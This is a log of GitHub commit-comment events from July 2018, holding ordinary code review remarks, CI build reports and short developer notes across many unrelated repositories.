{"id":"8041701385","type":"CommitCommentEvent","actor":{"login":"FingerNeko"},"repo":{"name":"FingerNeko/HelloWorld"},"payload":{"comment":{"id":29897668,"position":null,"line":null,"path":null,"commit_id":"c435f1bbacf957f5c44a38059f87d890c3eef14b","created_at":"2018-07-31T04:40:43Z","updated_at":"2018-07-31T04:40:43Z","author_association":"OWNER","body":"A"}},"created_at":"2018-07-31T04:40:43Z"}
{"id":"8041701387","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897669,"position":null,"line":null,"path":null,"commit_id":"29e3cad5912833f54521230c8a4cdf8ecf617b2d","created_at":"2018-07-31T04:40:43Z","updated_at":"2018-07-31T04:40:43Z","author_association":"COLLABORATOR","body":"I left that one in as it might be helpful for working out this normalisation bug."}},"created_at":"2018-07-31T04:40:43Z"}
{"id":"8041701889","type":"CommitCommentEvent","actor":{"login":"FingerNeko"},"repo":{"name":"FingerNeko/HelloWorld"},"payload":{"comment":{"id":29897670,"position":null,"line":null,"path":null,"commit_id":"d939ddb036f56b535e8fadea743eb84fe9ef45fe","created_at":"2018-07-31T04:40:53Z","updated_at":"2018-07-31T04:40:53Z","author_association":"OWNER","body":"B"}},"created_at":"2018-07-31T04:40:53Z"}
{"id":"8041703028","type":"CommitCommentEvent","actor":{"login":"rmohamadi"},"repo":{"name":"rmohamadi/iMet-Samples"},"payload":{"comment":{"id":29897672,"position":null,"line":null,"path":null,"commit_id":"83e344c5607605a5e63fc9d81a771e7ee9bcda09","created_at":"2018-07-31T04:41:20Z","updated_at":"2018-07-31T04:41:20Z","author_association":"OWNER","body":"iMet is a standalone software tool to reconcile metabolic networks where metabolic networks can be loaded, edited and integrated. This tool has been implemented using the Java programming language as a cross-platform tool with a user-friendly graphical interface. This tool can be used on each operating system with Java runtime environment (JRE). iMet has been extensively tested on the most common operating systems including: Linux, Windows and Macintosh."}},"created_at":"2018-07-31T04:41:20Z"}
{"id":"8041705105","type":"CommitCommentEvent","actor":{"login":"janlindstrom"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29897674,"position":2,"line":556,"path":"storage/innobase/dict/dict0boot.cc","commit_id":"92bdc28b5c88c7ccabe250a7b607089a23ad66fd","created_at":"2018-07-31T04:42:11Z","updated_at":"2018-07-31T04:42:11Z","author_association":"CONTRIBUTOR","body":"Commit message should contain reasoning why we are changing the format i.e. meaning of the DICT_HDR_MIX_ID_LOW field. Secondly, commit message should contain some description how you propose this new information is used (but I will now ques).  Problematic cases for restart still are:\r\n\r\n(1) ALL_ENCRYPTED and srv_encrypt_tables = [ON|FORCE] , you would still need to find tablespaces in wrong encryption state\r\n(2) ALL_DECRYPTED and srv_encrypt_tables = OFF again you would still need to find tablespaces in wrong encryption state\r\n(3) ENCRYPT_DECRYPT_MIX, How is this going to be useful ? \r\n\r\nIn restart before we have read page 0 from tablespace we do not really know encryption state. This change would help cases when everything is on correct state, but not to cases when it is not. There was few customers, who had hundreds of databases and they could contain > 10k tablespaces and in restart they really did not want us to read all those page 0's before server is up and running.\r\n\r\nSecondly, can we really change contents of DICT_HDR on GA-releases? In my opinion no. If customers really really need a way move database from one state to another there are other documented methods.\r\n\r\nLets us think how this could be solved. At restart if we really want to rotate only the tablespaces that need rotation we need to know them. So information of them should be stored somewhere. For example we have a system table containing encryption information/table or maybe a new field on SYS_TABLES. Both are not feasible on GA-releases."}},"created_at":"2018-07-31T04:42:11Z"}
{"id":"8041706577","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Games-with-Coding"},"payload":{"comment":{"id":29897676,"position":null,"line":null,"path":null,"commit_id":"06a6e455a5fe29ccbc70b068bc33ba0c1f645004","created_at":"2018-07-31T04:42:47Z","updated_at":"2018-07-31T04:42:47Z","author_association":"OWNER","body":"Time teller machine"}},"created_at":"2018-07-31T04:42:47Z"}
{"id":"8041708190","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897677,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-31T04:43:27Z","updated_at":"2018-07-31T04:43:27Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2981 of 2994 tests passed, 1 test warnings)\n\nMessages:\n\n * 14 tests had: EIO diffs.\n * 11 tests had: ESO big diffs.\n * 12 tests had: Table big diffs.\n * 3 tests had: ERR diffs.\n * 8 tests had: MTR big diffs.\n * 3 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 631\n * Failed: 13\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T04:43:27Z"}
{"id":"8041713396","type":"CommitCommentEvent","actor":{"login":"PetrHeinz"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29897686,"position":4,"line":103,"path":"composer.json","commit_id":"8b1b08573047fffe7c3c2b20fad3eb52931c8755","created_at":"2018-07-31T04:45:44Z","updated_at":"2018-07-31T04:45:44Z","author_association":"MEMBER","body":"Silex je deprecated právě díky Symfony 4 - oproti přechozím verzím se zaměřuje na odlehčování a zrychlování. Koukali jsme i na jiné možnosti, ale Symfony u nás nakonec vyhrálo. Lze jej jednoduše nainstalovat, SSFW chceme povýšit ze S3.4 právě na S4 a zkušenosti se budou hodit, v Symfony umíme snadněji vyvíjet a s rychlostí na tom rozhodně není špatně.\r\n\r\nDůležitým rysem microservisy je možnost ji od základu přepsat v poměrně krátkém časovém úseku - pokud by by potřeba vznikla, můžeme rozhodnutí v budoucnu znovu otevřít :slightly_smiling_face: "}},"created_at":"2018-07-31T04:45:44Z"}
{"id":"8041714422","type":"CommitCommentEvent","actor":{"login":"xkjyeah"},"repo":{"name":"datagovsg/beeline-frontend"},"payload":{"comment":{"id":29897688,"position":null,"line":null,"path":null,"commit_id":"35ff8081675ad2279c3555bf07132bc7a6ad9c68","created_at":"2018-07-31T04:46:10Z","updated_at":"2018-07-31T04:46:10Z","author_association":"CONTRIBUTOR","body":"I thought you wanted to refactoring this?"}},"created_at":"2018-07-31T04:46:10Z"}
{"id":"8041714993","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"Awsome-Areej/Fun-Stuff"},"payload":{"comment":{"id":29897690,"position":null,"line":null,"path":null,"commit_id":"551ab8f484ced4fb5ca93bc2f16ba9a101f13254","created_at":"2018-07-31T04:46:24Z","updated_at":"2018-07-31T04:46:24Z","author_association":"OWNER","body":"Welcome to the welcome code!"}},"created_at":"2018-07-31T04:46:24Z"}
{"id":"8041717066","type":"CommitCommentEvent","actor":{"login":"jdkanani"},"repo":{"name":"parsec-labs/solevm-truffle"},"payload":{"comment":{"id":29897692,"position":6,"line":234,"path":"contracts/EthereumRuntime.sol","commit_id":"5a7068171f888354e380d23c650015dcb484fc8f","created_at":"2018-07-31T04:47:17Z","updated_at":"2018-07-31T04:47:17Z","author_association":"NONE","body":"Ah! I tried to divide EthereumRuntime.sol but then `Internal or recursive type is not allowed for public or external functions` and much more weird errors. Let me try different things on this one."}},"created_at":"2018-07-31T04:47:17Z"}
{"id":"8041717602","type":"CommitCommentEvent","actor":{"login":"PetrHeinz"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29897694,"position":33,"line":33,"path":"microservices/product-search/src/Repository/ProductSearchRepository.php","commit_id":"8b1b08573047fffe7c3c2b20fad3eb52931c8755","created_at":"2018-07-31T04:47:27Z","updated_at":"2018-07-31T04:47:27Z","author_association":"MEMBER","body":"V tomto pro nás bylo důležité to co nejsnáze zprovoznit - v nejbližší době to nahradíme napojením na Elastic."}},"created_at":"2018-07-31T04:47:27Z"}
{"id":"8041717819","type":"CommitCommentEvent","actor":{"login":"Sumair001"},"repo":{"name":"Sumair001/Custom-Code"},"payload":{"comment":{"id":29897695,"position":2,"line":2,"path":"README.md","commit_id":"76c7c476b9710b7fce0e72a1a4bb905f0ee807e5","created_at":"2018-07-31T04:47:33Z","updated_at":"2018-07-31T04:47:33Z","author_association":"OWNER","body":"----------------------------------------------------------------------\r\n-- Data from rows to single column with no comma's\r\n\r\n\r\n\r\nDECLARE @listStr VARCHAR(MAX)\r\nSELECT @listStr = COALESCE(@listStr+',' ,'') + Keywords\r\nFROM lmsbook\r\n\r\nselect Distinct ColumnData from [dbo].[fn_CSVToTable](@listStr) Where ColumnData is not null And ColumnData <> ''\r\n\r\n\r\n\r\n----------------------------------------------------------------------"}},"created_at":"2018-07-31T04:47:33Z"}
{"id":"8041719894","type":"CommitCommentEvent","actor":{"login":"DigtalTony415"},"repo":{"name":"DigtalTony415/Random-Ayat"},"payload":{"comment":{"id":29897703,"position":null,"line":null,"path":null,"commit_id":"b158ca23ce7c5a5a69e8d66d395219ee93770eef","created_at":"2018-07-31T04:48:26Z","updated_at":"2018-07-31T04:48:26Z","author_association":"OWNER","body":"![image1](https://user-images.githubusercontent.com/41810941/43438271-3e6a768e-9442-11e8-81ca-ecb9e11540cb.png)\r\n\r\nthis images is needed to complete the GUI setup."}},"created_at":"2018-07-31T04:48:26Z"}
{"id":"8041725348","type":"CommitCommentEvent","actor":{"login":"huytd"},"repo":{"name":"ruby-vietnam/hardcore-rule"},"payload":{"comment":{"id":29897712,"position":106,"line":188,"path":"solution_collector/src/main.rs","commit_id":"f49eae3b7a244a5e793d0fec0b875ad9d8848bb5","created_at":"2018-07-31T04:50:45Z","updated_at":"2018-07-31T04:50:45Z","author_association":"COLLABORATOR","body":"No entry difficult ranking implemented. PRs needed."}},"created_at":"2018-07-31T04:50:45Z"}
{"id":"8041727035","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897713,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T04:51:26Z","updated_at":"2018-07-31T04:51:26Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-31T04:51:26Z"}
{"id":"8041728602","type":"CommitCommentEvent","actor":{"login":"hugeblank"},"repo":{"name":"hugeblank/Shatter"},"payload":{"comment":{"id":29897714,"position":null,"line":null,"path":null,"commit_id":"46e7a1b12d67ae822d6511459189620cf0ba31ba","created_at":"2018-07-31T04:52:07Z","updated_at":"2018-07-31T04:52:07Z","author_association":"OWNER","body":"Implements #2 forgot to mention in commit"}},"created_at":"2018-07-31T04:52:07Z"}
{"id":"8041729751","type":"CommitCommentEvent","actor":{"login":"AShalysh"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29897716,"position":28,"line":36,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-31T04:52:36Z","updated_at":"2018-07-31T04:52:36Z","author_association":"OWNER","body":":) вот что значит с языка на язык прыгать))) "}},"created_at":"2018-07-31T04:52:36Z"}
{"id":"8041730414","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897717,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T04:52:52Z","updated_at":"2018-07-31T04:52:52Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T04:52:52Z"}
{"id":"8041730766","type":"CommitCommentEvent","actor":{"login":"Awsome-Areej"},"repo":{"name":"raoufdridi/quantum_factoring"},"payload":{"comment":{"id":29897718,"position":null,"line":null,"path":null,"commit_id":"afd89c6db588b81264bee73e4ce7befec497a95f","created_at":"2018-07-31T04:53:00Z","updated_at":"2018-07-31T04:53:00Z","author_association":"NONE","body":"Cool!\r\n"}},"created_at":"2018-07-31T04:53:00Z"}
{"id":"8041732133","type":"CommitCommentEvent","actor":{"login":"tamiaodezhemenanqima"},"repo":{"name":"tamiaodezhemenanqima/-"},"payload":{"comment":{"id":29897720,"position":1,"line":1,"path":"README.md","commit_id":"8da6568a4e8949d308d13753bb9ea0da8bcf1ebf","created_at":"2018-07-31T04:53:36Z","updated_at":"2018-07-31T04:53:36Z","author_association":"OWNER","body":"打王者"}},"created_at":"2018-07-31T04:53:36Z"}
{"id":"8041734404","type":"CommitCommentEvent","actor":{"login":"tamiaodezhemenanqima"},"repo":{"name":"tamiaodezhemenanqima/-"},"payload":{"comment":{"id":29897726,"position":1,"line":1,"path":"README.md","commit_id":"8da6568a4e8949d308d13753bb9ea0da8bcf1ebf","created_at":"2018-07-31T04:54:34Z","updated_at":"2018-07-31T04:54:34Z","author_association":"OWNER","body":"吃鸡"}},"created_at":"2018-07-31T04:54:34Z"}
{"id":"8041734836","type":"CommitCommentEvent","actor":{"login":"sakakendo0321"},"repo":{"name":"teamET/2018.perform"},"payload":{"comment":{"id":29897727,"position":null,"line":null,"path":null,"commit_id":"d20ea1bfe73f2590cec2d2b3b4c1f442a4ec3e32","created_at":"2018-07-31T04:54:45Z","updated_at":"2018-07-31T04:54:45Z","author_association":"MEMBER","body":"http://kaoru2012.blogspot.com/2017/11/docker-executable-file-not-found-in-path.html"}},"created_at":"2018-07-31T04:54:45Z"}
{"id":"8041737080","type":"CommitCommentEvent","actor":{"login":"sharma-nidhi"},"repo":{"name":"Seagate/openSeaChest"},"payload":{"comment":{"id":29897728,"position":null,"line":null,"path":null,"commit_id":"52a968c89d47fefad62ae3620465d92218d7a34f","created_at":"2018-07-31T04:55:40Z","updated_at":"2018-07-31T04:55:40Z","author_association":"CONTRIBUTOR","body":"@xahmad @vonericsen \r\nPlease review."}},"created_at":"2018-07-31T04:55:40Z"}
{"id":"8041743137","type":"CommitCommentEvent","actor":{"login":"tobozo"},"repo":{"name":"tobozo/M5Stack-SD-Updater"},"payload":{"comment":{"id":29897738,"position":null,"line":null,"path":null,"commit_id":"589e714094fedef1284da831edd39a5da7d9b4d8","created_at":"2018-07-31T04:58:22Z","updated_at":"2018-07-31T04:58:22Z","author_association":"OWNER","body":"sure why not"}},"created_at":"2018-07-31T04:58:22Z"}
{"id":"8041743311","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"duckietown/duckietown-shell"},"payload":{"comment":{"id":29897739,"position":3,"line":3,"path":"README.md","commit_id":"5ae538e196a2ef10c295fec78d673412810966c7","created_at":"2018-07-31T04:58:27Z","updated_at":"2018-07-31T04:58:27Z","author_association":"MEMBER","body":"100% Python? Most Duckietown scripts are already written in Bash..."}},"created_at":"2018-07-31T04:58:27Z"}
{"id":"8041744425","type":"CommitCommentEvent","actor":{"login":"ge0rdi"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29897741,"position":null,"line":null,"path":null,"commit_id":"fa6a25085b16a2c67d15667e39ad4d5de45ec9ab","created_at":"2018-07-31T04:58:54Z","updated_at":"2018-07-31T04:58:54Z","author_association":"CONTRIBUTOR","body":"@dmex \r\nCommits like this are created when you have some changes in local repo and you are pulling changes from remote.\r\nBy default git does _merge_ during pull.\r\n\r\nTo avoid such (bogus) commits you can do `git pull --rebase` so that git will first update head and then put your local changes on top of it.\r\n\r\nEventually you can instruct git to do it by default:\r\n`git config --global pull.rebase true`"}},"created_at":"2018-07-31T04:58:54Z"}
{"id":"8041745734","type":"CommitCommentEvent","actor":{"login":"francasense"},"repo":{"name":"francasense/fsfwefdefeeddfcef"},"payload":{"comment":{"id":29897745,"position":null,"line":null,"path":null,"commit_id":"66031955c8466decf690c1968b0aaca44437d1c3","created_at":"2018-07-31T04:59:29Z","updated_at":"2018-07-31T04:59:29Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T04:59:29Z"}
{"id":"8041750435","type":"CommitCommentEvent","actor":{"login":"jamesneal"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29897758,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-31T05:01:11Z","updated_at":"2018-07-31T05:01:11Z","author_association":"NONE","body":"@Zaf9670 Yeah, good suggestion.  I did that, but they're still unable to keep up.  \r\n\r\nI should add that it can keep up as long as the fan isn't on full **and** it's not extruding filament at full bore.   So, Layer 1 is fine (fan is off).  Layer 2, when the fan kicks on, and it's laying down solid layers is where the problem starts. \r\n\r\nI adjusted my slic3r fan settings to only run the fan at 75%, and all my thermal runaway problems are solved. :)"}},"created_at":"2018-07-31T05:01:11Z"}
{"id":"8041753253","type":"CommitCommentEvent","actor":{"login":"hyunwoo"},"repo":{"name":"55rgt/TTL_Gallery"},"payload":{"comment":{"id":29897760,"position":7,"line":8,"path":"public/javascripts/layout.js","commit_id":"6d70f7ae990ba95311e2444e8023efd12c99459e","created_at":"2018-07-31T05:02:14Z","updated_at":"2018-07-31T05:02:14Z","author_association":"NONE","body":"스크롤???"}},"created_at":"2018-07-31T05:02:14Z"}
{"id":"8041755201","type":"CommitCommentEvent","actor":{"login":"dilipdevaraj-sfdc"},"repo":{"name":"salesforce/Argus"},"payload":{"comment":{"id":29897764,"position":15,"line":154,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/metric/transform/FillTransform.java","commit_id":"d8ba53a2f335bc7f7196fef2ff542d4a12e79196","created_at":"2018-07-31T05:03:01Z","updated_at":"2018-07-31T05:03:01Z","author_association":"CONTRIBUTOR","body":"@sundeepsf\r\nSince this is a change to existing code in 2.17 release branch, just for this PR can you increment all version files to 2.17.2.\r\n(This is because maven central already has 2.17.1, and will not allow you to override artifacts).\r\n\r\nGoing forward only when the release branch is fully qualified we will release it to master so we don't need to keep incrementing version."}},"created_at":"2018-07-31T05:03:01Z"}
{"id":"8041767470","type":"CommitCommentEvent","actor":{"login":"deepanshurana165"},"repo":{"name":"deepanshurana165/Trackerz"},"payload":{"comment":{"id":29897794,"position":null,"line":null,"path":null,"commit_id":"6261d3263714430c43f249f1c1d270b402153d27","created_at":"2018-07-31T05:08:04Z","updated_at":"2018-07-31T05:08:04Z","author_association":"OWNER","body":"merged branches"}},"created_at":"2018-07-31T05:08:04Z"}
{"id":"8041770853","type":"CommitCommentEvent","actor":{"login":"saschatimme"},"repo":{"name":"JuliaAlgebra/StaticPolynomials.jl"},"payload":{"comment":{"id":29897797,"position":5,"line":8,"path":".travis.yml","commit_id":"73d4eacc559d11266d4f1e4afc5d35485ba44033","created_at":"2018-07-31T05:09:18Z","updated_at":"2018-07-31T05:09:18Z","author_association":"COLLABORATOR","body":"That's true, somehow this doesn't came into my mind. Added it back now, thank you!"}},"created_at":"2018-07-31T05:09:18Z"}
{"id":"8041771868","type":"CommitCommentEvent","actor":{"login":"pcottle"},"repo":{"name":"pcottle/learnGitBranching"},"payload":{"comment":{"id":29897798,"position":9,"line":73,"path":"src/template.index.html","commit_id":"9a60b082f35d26316ac240934826365b68c6ea53","created_at":"2018-07-31T05:09:42Z","updated_at":"2018-07-31T05:09:42Z","author_association":"OWNER","body":"hrm? something wrong here?"}},"created_at":"2018-07-31T05:09:42Z"}
{"id":"8041773516","type":"CommitCommentEvent","actor":{"login":"DigtalTony415"},"repo":{"name":"DigtalTony415/Random-Ayat"},"payload":{"comment":{"id":29897800,"position":null,"line":null,"path":null,"commit_id":"379d33d79378cab10bd1745420d1225900c883f1","created_at":"2018-07-31T05:10:19Z","updated_at":"2018-07-31T05:10:19Z","author_association":"OWNER","body":"![image1](https://user-images.githubusercontent.com/41810941/43438893-51639ba0-9445-11e8-8eab-70310e59f6c3.png)\r\n\r\nthis is needed to complete the GUI setup."}},"created_at":"2018-07-31T05:10:19Z"}
{"id":"8041777407","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"wszuwar/Task"},"payload":{"comment":{"id":29897807,"position":21,"line":46,"path":"src/test/java/com/crud/tasks/controller/TaskControllerTest.java","commit_id":"d9e13c1c0bb566935ec4f5ed844c9e2136d01809","created_at":"2018-07-31T05:11:46Z","updated_at":"2018-07-31T05:11:46Z","author_association":"NONE","body":"Obiektu typu Task nie powinno tutaj być"}},"created_at":"2018-07-31T05:11:46Z"}
{"id":"8041778339","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"wszuwar/Task"},"payload":{"comment":{"id":29897809,"position":32,"line":143,"path":"src/test/java/com/crud/tasks/controller/TaskControllerTest.java","commit_id":"d9e13c1c0bb566935ec4f5ed844c9e2136d01809","created_at":"2018-07-31T05:12:07Z","updated_at":"2018-07-31T05:12:07Z","author_association":"NONE","body":"do put nie przekazuje się id"}},"created_at":"2018-07-31T05:12:07Z"}
{"id":"8041778590","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897811,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T05:12:12Z","updated_at":"2018-07-31T05:12:12Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T05:12:12Z"}
{"id":"8041779167","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"wszuwar/Task"},"payload":{"comment":{"id":29897812,"position":56,"line":175,"path":"src/test/java/com/crud/tasks/controller/TaskControllerTest.java","commit_id":"d9e13c1c0bb566935ec4f5ed844c9e2136d01809","created_at":"2018-07-31T05:12:24Z","updated_at":"2018-07-31T05:12:24Z","author_association":"NONE","body":"Do post nie przekazuje się id"}},"created_at":"2018-07-31T05:12:24Z"}
{"id":"8041781915","type":"CommitCommentEvent","actor":{"login":"hugeblank"},"repo":{"name":"hugeblank/Shatter"},"payload":{"comment":{"id":29897818,"position":null,"line":null,"path":null,"commit_id":"03ada9f432f87fab944e595a28fe3d4fb97d674e","created_at":"2018-07-31T05:13:30Z","updated_at":"2018-07-31T05:13:30Z","author_association":"OWNER","body":"Things I forgot to mention:\r\n- Implements #2 \r\n- Fixed some error outputs so that they better reflect the actual term library\r\n- Added some smatterings of comments about\r\n\r\nThings I remembered to mention but were already pushed:\r\n`- changed how the cursor object is created`\r\nthis was already mentioned and changed in 4f1f0d5fbb95afa5539739cbcd786ec7afa469d1"}},"created_at":"2018-07-31T05:13:30Z"}
{"id":"8041785750","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897824,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T05:14:58Z","updated_at":"2018-07-31T05:14:58Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2957 of 2957 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T05:14:58Z"}
{"id":"8041786688","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29897831,"position":15,"line":16,"path":"Lesson3/train.rb","commit_id":"3739340bb74a9e0d2b41394fd1fcf56a0ead6b13","created_at":"2018-07-31T05:15:20Z","updated_at":"2018-07-31T05:15:20Z","author_association":"NONE","body":"- здесь видимо имелось в виду `@speed -= speed`\r\n- проверку я бы записал `@speed >= speed` - мне кажется так легче читается\r\n- в этом методе и в \"эдд спид\" лучше аргумент назвать как-то иначе, к примеру `value`, `change`, потому что в текущей реализации он у тебя совпадает по имени с ридером для текущей скорости - можно получить \"неожиданные результаты\" "}},"created_at":"2018-07-31T05:15:20Z"}
{"id":"8041811688","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29897880,"position":null,"line":null,"path":null,"commit_id":"4d3a7640c3e3efea05403e663e491ac95dee4665","created_at":"2018-07-31T05:25:01Z","updated_at":"2018-07-31T05:25:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-142](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-142-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T05:25:01Z"}
{"id":"8041812820","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29897881,"position":51,"line":46,"path":"Lesson3/train.rb","commit_id":"3739340bb74a9e0d2b41394fd1fcf56a0ead6b13","created_at":"2018-07-31T05:25:28Z","updated_at":"2018-07-31T05:25:28Z","author_association":"NONE","body":"лучше просто `current_position`, `previous_position`, `next_position`"}},"created_at":"2018-07-31T05:25:28Z"}
{"id":"8041813685","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29897882,"position":null,"line":null,"path":null,"commit_id":"809e4d59cf2437dc15e9ce307a4dcf0897f72792","created_at":"2018-07-31T05:25:49Z","updated_at":"2018-07-31T05:25:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-264](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-264).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-264-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T05:25:49Z"}
{"id":"8041820422","type":"CommitCommentEvent","actor":{"login":"FREEqueenC"},"repo":{"name":"FREEqueenC/closed-shell-system"},"payload":{"comment":{"id":29897888,"position":null,"line":null,"path":null,"commit_id":"f482b4f83a6ac61c6ce6eecf4e6d049c7b9474a9","created_at":"2018-07-31T05:28:26Z","updated_at":"2018-07-31T05:28:26Z","author_association":"OWNER","body":"lol darn didnt know the password :p yet"}},"created_at":"2018-07-31T05:28:26Z"}
{"id":"8041820799","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29897889,"position":null,"line":null,"path":null,"commit_id":"95530cc5ac5f158fefabab4b4ffd8b1b324e38c4","created_at":"2018-07-31T05:28:34Z","updated_at":"2018-07-31T05:28:34Z","author_association":"CONTRIBUTOR","body":"hpp additions missing from last few commits :("}},"created_at":"2018-07-31T05:28:34Z"}
